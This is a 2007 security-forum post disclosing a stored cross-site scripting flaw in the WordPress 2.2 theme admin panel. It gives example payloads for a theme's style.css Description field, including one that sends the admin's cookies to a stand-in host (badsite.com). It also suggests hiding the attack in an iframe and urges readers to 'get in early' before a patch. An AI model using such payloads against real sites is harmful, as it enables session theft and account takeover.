|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 82
Members: 0
Total: 82
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Wordpress 2.2 XSS |
|
Posted: Thu May 24, 2007 7:22 pm |
|
|
danbradster |
Valuable expert |
|
|
Joined: Apr 01, 2006 |
Posts: 4 |
Location: Australia |
|
|
|
|
|
|
There is a critical XSS vulnerability within the theming section of the admin panel; they do not removing tags such as <script> thus leaving a hole where any theme developer can release a theme where when the admin views a theme in the themes section it executes javascript.
As an example, in my theme's style.css file I change Description: to -
Description: <script>alert("hi")</script>
Description: <script>alert(document.cookie)</script>
Description: <script>window.location="http://www.badsite.com/cookies.php?"+document.cookie</script>
The final example is obviously the worst. If I wanted to have the vulnerability execute while staying hidden I could create a hidden iframe and execute the redirect in the iframe.
This vulnerability is a simple one and I am quite surprised to see it. If they don't filter this input I assume you don't filter other input from themes such as the footer - if the iframe example used above is placed in the footer of a theme the situation could be even more dangerous. If a website is using the URL http://www.website.com/wordpress/ the cookies of http://www.website.com/ are also insecure.
I have contacted them about the issue so get in early before they patch it. |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|